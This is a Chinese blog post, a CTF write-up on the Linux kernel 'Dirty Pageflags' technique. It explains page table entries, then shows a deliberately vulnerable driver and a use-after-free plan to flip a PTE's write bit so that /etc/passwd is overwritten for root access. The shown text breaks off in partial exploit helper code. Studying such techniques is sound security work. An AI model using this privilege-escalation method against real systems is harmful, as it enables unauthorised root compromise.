

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/666.jpg">
  <link rel="icon" href="/img/666.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#ffffff">
  <meta name="author" content="roxy">
  <meta name="keywords" content="">
  
    <meta name="description" content="Dirty Pageflags今天学习了一种在Linux内核中对PTE的exploitation技术，名为Dirty Pageflags 参考这位日本pwn大佬: https:&#x2F;&#x2F;ptr-yudai.hatenablog.com&#x2F;entry&#x2F;2025&#x2F;09&#x2F;14&#x2F;180326 前置知识PTE是Page Table Entry(页表项) 在OS的学习中，我们已经知道 它是虚拟内存管理中最核心的数据结">
<meta property="og:type" content="article">
<meta property="og:title" content="Dirty Pageflags Kernel pwn">
<meta property="og:url" content="https://rr00xxyy.github.io/2026/04/06/Dirty-Pageflags-Kernel-pwn/index.html">
<meta property="og:site_name" content="roxy&#39;s blog">
<meta property="og:description" content="Dirty Pageflags今天学习了一种在Linux内核中对PTE的exploitation技术，名为Dirty Pageflags 参考这位日本pwn大佬: https:&#x2F;&#x2F;ptr-yudai.hatenablog.com&#x2F;entry&#x2F;2025&#x2F;09&#x2F;14&#x2F;180326 前置知识PTE是Page Table Entry(页表项) 在OS的学习中，我们已经知道 它是虚拟内存管理中最核心的数据结">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://rr00xxyy.github.io/images/135.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/136.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/137.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/138.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/140.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/141.png">
<meta property="article:published_time" content="2026-04-06T15:07:58.000Z">
<meta property="article:modified_time" content="2026-04-15T16:14:30.605Z">
<meta property="article:author" content="roxy">
<meta property="article:tag" content="&#x2F;etc&#x2F;passwd">
<meta property="article:tag" content="Dirty Pageflags">
<meta property="article:tag" content="PTE">
<meta property="article:tag" content="buddy system">
<meta property="article:tag" content="cpu">
<meta property="article:tag" content="kernel">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="root">
<meta property="article:tag" content="slab">
<meta property="article:tag" content="spray">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://rr00xxyy.github.io/images/135.png">
  
  
  
  <title>Dirty Pageflags Kernel pwn - roxy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  



  
<link rel="stylesheet" href="/css/mui-fluid.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"rr00xxyy.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body class="post-page post-page">
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/a.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Dirty Pageflags Kernel pwn"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-06 23:07" pubdate>
          2026年4月6日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          15k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          123 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Dirty Pageflags Kernel pwn</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Dirty-Pageflags"><a href="#Dirty-Pageflags" class="headerlink" title="Dirty Pageflags"></a>Dirty Pageflags</h1><p>今天学习了一种在Linux内核中对<code>PTE</code>的exploitation技术，名为<strong>Dirty Pageflags</strong></p>
<p>参考这位日本pwn大佬:</p>
<p><a target="_blank" rel="noopener" href="https://ptr-yudai.hatenablog.com/entry/2025/09/14/180326">https://ptr-yudai.hatenablog.com/entry/2025/09/14/180326</a></p>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><p><strong>PTE</strong>是<code>Page Table Entry</code>(页表项)</p>
<p>在OS的学习中，我们已经知道</p>
<p>它是虚拟内存管理中最核心的数据结构之一，配合着<code>MMU</code>，用于将进程的<code>虚拟地址</code>转换为<code>物理地址</code>，并控制对该页面的<strong>访问权限</strong>和<strong>状态</strong></p>
<p>每个页表项(通常对应<code>4KB</code>或<code>2MB</code>大小的内存页)记录了<code>虚拟页</code>被映射到了哪个<code>物理页框</code>(物理页帧号，<strong>PFN</strong>)</p>
<p>在x86-64架构下，一个PTE的结构如下所示:</p>
<p><img src="/images/135.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>其中52-62位是留给内核软件用的<code>自由位</code></p>
<p>第63位见下面</p>
<p>0-51位便是上面所说的PFN(物理页帧号)</p>
<p>而因为一个物理页的页大小是<code>4KB</code>，即4096字节，所以其低12位地址为0，只需存储高40位地址即可</p>
<p>故0-11位作为<code>标志位</code>使用</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">物理地址 = (PFN &lt;&lt; 12) + 页内偏移<br></code></pre></td></tr></table></figure>

<p>我们重点关注以下<strong>标志位</strong>(Pageflags):</p>
<ul>
<li><p>0 位 -&gt; P(present) 用于记录页面是否在物理内存中，如果为1，则存在，如果为0，则不存在，访问该页会触发缺页异常(<code>page fault</code>)</p>
</li>
<li><p>1 位 -&gt; <strong>R&#x2F;W</strong>(read&#x2F;write) <strong>用于记录是否可写，0代表只读，1则代表可读写</strong></p>
</li>
<li><p>2 位 -&gt; U&#x2F;S(user&#x2F;supervisor) 用于记录允许访问的权限级别，0代表内核态才允许访问(ring 0-2)，1则用户态亦可访问(ring 3)</p>
</li>
<li><p>6 位 -&gt; <strong>D</strong>(dirty) 是否被写入过，由<code>CPU</code>设置，内核用于决定换出时是否需要写回<code>磁盘</code>，即<code>脏页</code></p>
</li>
<li><p>63 位 -&gt; XD(execute disable) cpu从该页所取的指令是否允许执行，0为可执行，1则不可执行，我们也可以叫它<code>NX</code>😄</p>
</li>
</ul>
<p>试想一下</p>
<p>如果PTE中一个虚拟地址对应记录一个物理地址，而PTE还是要放在内存的</p>
<p>一个进程的页表本身就会大得无法接受</p>
<p>因此，Linux采用分层的<strong>多级页表</strong>来按需分配，以节省内存</p>
<p>我们重点关注x86-64架构下的四级页表结构</p>
<p><img src="/images/136.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>如图所示</p>
<p>对于一个64位的虚拟地址</p>
<p>其低48位拆分为多个索引字段</p>
<p>PGD索引(9 bits) -&gt; PUD索引(9 bits) -&gt; PMD索引(9 bits) -&gt; PTE索引(9 bits) -&gt; 页内偏移(12 bits)</p>
<p>具体:</p>
<p><img src="/images/137.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<div class="note note-info">
            <p>对于一个虚拟地址</p> <p><code>CPU</code>的<code>MMU</code>查找过程如下:</p> <p>从<code>CR3</code>寄存器获得<code>PGD</code>页的物理地址</p> <p>取虚拟地址的<code>bits 47-39</code>作为PGD索引，找到对应的PUD页表项(如果该PGD项为<code>null</code>，则触发<code>page fault</code>)</p> <p>取<code>bits 38-30</code>作为PUD索引，找到PMD页表项</p> <p>取<code>bits 29-21</code>作为PMD索引，找到PTE页表项</p> <p>取<code>bits 20-12</code>作为PTE索引，找到<strong>物理页框</strong></p> <p>ps:PTE中包含PFN与标志位，上面已经介绍过了</p> <p>最后<code>bits 11-0</code>作为页内偏移，得到最终的物理地址</p> 
          </div>

<p>同时，x86-64中每一级页表都是4KB，而一个<code>entry</code>是8字节，所以每一级有<strong>512</strong>项</p>
<p>最后，虚拟地址的高16位作用是什么呢?</p>
<p>它们的内容必须与第47位(虚拟地址的最高有效位)完全相同</p>
<p>这种形式的地址被称为<strong>规范地址</strong>(Canonical Address)</p>
<p>这本质上是一种<strong>符号扩展</strong>(Sign Extension)，将地址空间一分为二</p>
<p>当第47位为0时，高16位也全为0，地址落在<strong>用户空间</strong>(<code>0x0000_0000_0000_0000</code> ~ <code>0x0000_7FFF_FFFF_FFFF</code>)</p>
<p>当第47位为1时，高16位也全为1，地址落在<strong>内核空间</strong>(<code>0xFFFF_8000_0000_0000</code> ~ <code>0xFFFF_FFFF_FFFF_FFFF</code>)</p>
<p>CPU的<code>MMU</code>只处理<strong>规范地址</strong></p>
<p>如果软件试图访问非规范地址，则会直接触发<code>#GP异常</code>(General Protection Fault)</p>
<p>这样设计的关键考量是为未来的扩展留出空间</p>
<p>如果将来需要更大的地址空间，硬件可以增加页表层级(比如到57位)，那些高16位目前是全1或全0的规范地址，在未来依然会是有效的规范地址，保证了<strong>向前兼容性</strong></p>
<div class="note note-secondary">
            <p>ASLR KASLR PIE 原理</p> <p><code>/proc/sys/kernel/randomize_va_space</code></p> <p><strong>熵</strong></p> <p>待补充…</p> 
          </div>

<div class="note note-danger">
            <p>内核保护:</p> <p>SMEP SMAP KPTI KASLR</p> <p>待补充…</p> 
          </div>

<h2 id="exploitation"><a href="#exploitation" class="headerlink" title="exploitation"></a>exploitation</h2><p>了解了前置知识</p>
<p>我们来看看具体的exploitation方法</p>
<h3 id="Dirty-Pagetable"><a href="#Dirty-Pagetable" class="headerlink" title="Dirty Pagetable"></a>Dirty Pagetable</h3><p>名字似乎很像</p>
<p>但完全不一样</p>
<p>我还没学</p>
<p>故引用原文…</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs text">Dirty Pagetable is a powerful exploitation technique that targets heap vulnerabilities in the Linux kernel.<br><br>The core idea is to overlap a freed object with a page table entry (PTE). By writing to the freed object, an attacker can directly manipulate the page table. Since each PTE maps to a physical memory address, this provides extremely strong control over physical memory. As a result, Dirty Pagetable can bypass critical security mechanisms such as KASLR, SMAP, and SMEP.<br></code></pre></td></tr></table></figure>

<h3 id="Dirty-Pageflags-1"><a href="#Dirty-Pageflags-1" class="headerlink" title="Dirty Pageflags"></a>Dirty Pageflags</h3><p>不同于<code>Dirty Pagetable</code>操纵整个PTE以达成任意物理地址读写原语</p>
<p><code>Dirty Pageflags</code>关注操纵PTE的标志位以完成利用并最终提权</p>
<p>那么哪个标志位有助于我们的exploitation呢?</p>
<p>U&#x2F;S?</p>
<p>XD?</p>
<p>然而并不是</p>
<p>它们虽然涉及访问与执行权限控制，但却不能真正帮助我们exploitation</p>
<p>考虑一下R&#x2F;W呢?</p>
<p>想象一个只读文件</p>
<p>比如(<code>/etc/passwd</code>)</p>
<p>我们将其映射到内存中</p>
<p><img src="/images/138.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>我们操纵其PTE的R&#x2F;W标志位</p>
<p>利用<code>UAF</code>等漏洞</p>
<p>将0置为1</p>
<p>只读变为可读写</p>
<p>随后我们向<code>/etc/passwd</code>中写入恶意内容</p>
<p><img src="/images/140.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>虽然此时修改只发生在内存中，还没有被写回到文件</p>
<p>但是，CPU会自动把PTE中的<code>D</code>(dirty)位设置为1，表示这个页面已经被修改过</p>
<p>最后，当内存区域被解除映射(<code>unmap</code>)时，Linux内核看到该页的<code>D</code>位被置1，就会认为这个页面必须被回写到它对应的后备文件</p>
<p>于是原本应该只读的文件(<code>/etc/passwd</code>)就被我们所写的恶意内容所覆盖了</p>
<p>root到手</p>
<h2 id="example"><a href="#example" class="headerlink" title="example"></a>example</h2><p>题目来自2025 Black Hat MEA资格赛的pwn kinc</p>
<h3 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h3><p>下面是<code>vuln.c</code></p>
<p>不用逆向，真不错</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/fs.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/miscdevice.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/module.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/mutex.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/slab.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/uaccess.h&gt;</span></span><br><br>MODULE_LICENSE(<span class="hljs-string">&quot;GPL&quot;</span>);<br>MODULE_AUTHOR(<span class="hljs-string">&quot;ptr-yudai&quot;</span>);<br>MODULE_DESCRIPTION(<span class="hljs-string">&quot;A vulnerable driver for a CTF&quot;</span>);<br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_ALLOC   0x0268</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_INC     0x0298</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_SEL     0x01c1</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_DELETE  0x0831</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MAX_OBJ_NUM 0x100</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> PAD_SIZE    0x7f8</span><br><br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">obj</span> &#123;</span><br>  <span class="hljs-type">char</span> buf[PAD_SIZE];<br>  <span class="hljs-type">size_t</span> cnt;<br>&#125;;<br><br><span class="hljs-type">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">kmem_cache</span> *<span class="hljs-title">obj_cachep</span>;</span><br><span class="hljs-type">static</span> <span class="hljs-title function_">DEFINE_MUTEX</span><span class="hljs-params">(module_lock)</span>;<br><br><span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> inc_used = <span class="hljs-number">0</span>;<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">obj</span> *<span class="hljs-title">selected</span> =</span> <span class="hljs-number">0</span>;<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">obj</span> *<span class="hljs-title">obj_array</span>[<span class="hljs-title">MAX_OBJ_NUM</span>] =</span> &#123; <span class="hljs-literal">NULL</span> &#125;;<br><br><span class="hljs-type">static</span> <span class="hljs-type">long</span> <span class="hljs-title function_">module_ioctl</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> file *file, <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> cmd, <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> arg)</span> &#123;<br>  <span class="hljs-type">long</span> ret = -EINVAL;<br>  mutex_lock(&amp;module_lock);<br><br>  <span class="hljs-keyword">if</span> (arg &gt;= MAX_OBJ_NUM)<br>    <span class="hljs-keyword">goto</span> out;<br><br>  <span class="hljs-keyword">switch</span> (cmd) &#123;<br>    <span class="hljs-keyword">case</span> CMD_ALLOC:<br>      obj_array[arg] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);<br>      ret = <span class="hljs-number">0</span>;<br>      <span class="hljs-keyword">break</span>;<br><br>    <span class="hljs-keyword">case</span> CMD_SEL:<br>      <span class="hljs-keyword">if</span> (!obj_array[arg])<br>        <span class="hljs-keyword">goto</span> out;<br>      selected = obj_array[arg];<br>      ret = <span class="hljs-number">0</span>;<br>      <span class="hljs-keyword">break</span>;<br><br>    <span class="hljs-keyword">case</span> CMD_INC:<br>      <span class="hljs-keyword">if</span> (inc_used++ &gt; <span class="hljs-number">1</span>)<br>        <span class="hljs-keyword">goto</span> out;<br>      selected-&gt;cnt++;<br>      ret = <span class="hljs-number">0</span>;<br>      <span class="hljs-keyword">break</span>;<br><br>    <span class="hljs-keyword">case</span> CMD_DELETE:<br>      <span class="hljs-keyword">if</span> (!obj_array[arg])<br>        <span class="hljs-keyword">goto</span> out;<br>      kmem_cache_free(obj_cachep, obj_array[arg]);<br>      obj_array[arg] = <span class="hljs-literal">NULL</span>;<br>      ret = <span class="hljs-number">0</span>;<br>      <span class="hljs-keyword">break</span>;<br>  &#125;<br><br> out:<br>  mutex_unlock(&amp;module_lock);<br>  <span class="hljs-keyword">return</span> ret;<br>&#125;<br><br><span class="hljs-type">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">file_operations</span> <span class="hljs-title">module_fops</span> =</span> &#123;<br>  .owner          = THIS_MODULE,<br>  .unlocked_ioctl = module_ioctl,<br>&#125;;<br><br><span class="hljs-type">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">miscdevice</span> <span class="hljs-title">vuln_dev</span> =</span> &#123;<br>  .minor = MISC_DYNAMIC_MINOR,<br>  .name = <span class="hljs-string">&quot;vuln&quot;</span>,<br>  .fops = &amp;module_fops<br>&#125;;<br><br><span class="hljs-type">static</span> <span class="hljs-type">int</span> __init <span class="hljs-title function_">module_initialize</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> &#123;<br>  <span class="hljs-keyword">if</span> (misc_register(&amp;vuln_dev) != <span class="hljs-number">0</span>)<br>    <span class="hljs-keyword">return</span> -EBUSY;<br><br>  obj_cachep = KMEM_CACHE(obj, <span class="hljs-number">0</span>);<br>  <span class="hljs-keyword">if</span> (!obj_cachep) &#123;<br>    misc_deregister(&amp;vuln_dev);<br>    <span class="hljs-keyword">return</span> -EBUSY;<br>  &#125;<br><br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br><span class="hljs-type">static</span> <span class="hljs-type">void</span> __exit <span class="hljs-title function_">module_cleanup</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> &#123;<br>  misc_deregister(&amp;vuln_dev);<br>  mutex_destroy(&amp;module_lock);<br>&#125;<br><br>module_init(module_initialize);<br>module_exit(module_cleanup);<br></code></pre></td></tr></table></figure>

<p>内核模块<code>vuln.ko</code>提供了以下<code>ioctl</code>命令:</p>
<p>CMD_ALLOC -&gt; 分配一个<code>struct obj</code>(大小为<code>0x800</code>字节)，存入<code>obj_array[index]</code></p>
<p>CMD_SEL -&gt; 将<code>selected</code>指针指向<code>obj_array[index]</code></p>
<p>CMD_INC -&gt; 执行<code>selected-&gt;cnt++</code>(但限制最多连续两次)</p>
<p>CMD_DELETE -&gt; 释放<code>obj_array[index]</code>并清空数组项，<strong>但不清除selected</strong></p>
<p>漏洞点很明显</p>
<p>释放对象后，<code>selected</code>仍指向已释放内存</p>
<p>通过两次<code>CMD_INC</code>，可以修改这块释放内存中的<code>cnt</code>字段(偏移<code>0x7f8</code>处，8字节)</p>
<p><strong>UAF</strong>存在</p>
<p>累了</p>
<p>休息</p>
<p>明天再写</p>
<p>晚安</p>
<hr>
<p>ok</p>
<p>我回来了</p>
<p>即使存在<code>UAF</code></p>
<p>但只有两次的<code>CMD_INC</code>使用机会(+1 +1 没了)</p>
<p>该如何完成利用呢?</p>
<p>想必你已经想到了</p>
<p>我们将只读的<code>/etc/passwd</code>映射到内存中</p>
<p>其在PTE表项中的低2位分别是标志位P和R&#x2F;W</p>
<p>表现为 0(只读) 1(present)</p>
<p>我们利用UAF</p>
<p>执行两次<code>CMD_INC</code></p>
<p>标志位变为</p>
<p>1(<strong>可读可写</strong>!) 1(present 保证存在)</p>
<p>随后写入恶意内容，例如，将root的密码设为空…</p>
<p>便能完成利用并提权</p>
<p>但是有一个问题</p>
<p>如何保证我们能控制UAF的object恰好对应&#x2F;etc&#x2F;passwd的PTE呢?</p>
<p>那便要引出<strong>spray</strong>技术了</p>
<h3 id="spray"><a href="#spray" class="headerlink" title="spray"></a>spray</h3><p>从栈的<code>nop sled</code>到堆的<code>heap spray</code>(<strong>堆喷射</strong>)</p>
<p>其都是<code>spray</code>技术的思想</p>
<p><strong>spray</strong>(<code>喷射</code>)是一种用来提高漏洞利用成功率的<code>弹药填充</code>或<code>地貌改造</code>技术</p>
<p>它本身不直接制造漏洞</p>
<p>而是创造一个对攻击者有利的内存环境</p>
<p>让后续的漏洞利用(如UAF，堆溢出)更容易且稳定地命中目标</p>
<h3 id="具体exploitation"><a href="#具体exploitation" class="headerlink" title="具体exploitation"></a>具体exploitation</h3><p>我们先定义下列函数:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">char</span>* <span class="hljs-title function_">PTI_TO_VIRT</span><span class="hljs-params">(<span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  assert (pgd &lt; <span class="hljs-number">0x200</span> &amp;&amp; pud &lt; <span class="hljs-number">0x200</span> &amp;&amp; pmd &lt; <span class="hljs-number">0x200</span> &amp;&amp; pte &lt; <span class="hljs-number">0x200</span>);<br>  <span class="hljs-keyword">return</span> (<span class="hljs-type">void</span>*)((pgd &lt;&lt; <span class="hljs-number">39</span>) + (pud &lt;&lt; <span class="hljs-number">30</span>) + (pmd &lt;&lt; <span class="hljs-number">21</span>) + (pte &lt;&lt; <span class="hljs-number">12</span>));<br>&#125;<br><span class="hljs-type">void</span>* <span class="hljs-title function_">mmap_by_pti</span><span class="hljs-params">(<span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  <span class="hljs-type">void</span> *p = (<span class="hljs-type">void</span>*)PTI_TO_VIRT(pgd, pud, pmd, pte);<br>  <span class="hljs-type">void</span> *q = mmap(p, <span class="hljs-number">0x1000</span>, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED|MAP_FIXED, <span class="hljs-number">-1</span>, <span class="hljs-number">0</span>);<br>  assert (p == q);<br>  <span class="hljs-keyword">return</span> p;<br>&#125;<br><span class="hljs-type">void</span>* <span class="hljs-title function_">mmap_file_by_pti</span><span class="hljs-params">(<span class="hljs-type">int</span> fd, <span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  <span class="hljs-type">void</span> *p = (<span class="hljs-type">void</span>*)PTI_TO_VIRT(pgd, pud, pmd, pte);<br>  <span class="hljs-type">void</span> *q = mmap(p, <span class="hljs-number">0x1000</span>, PROT_READ, 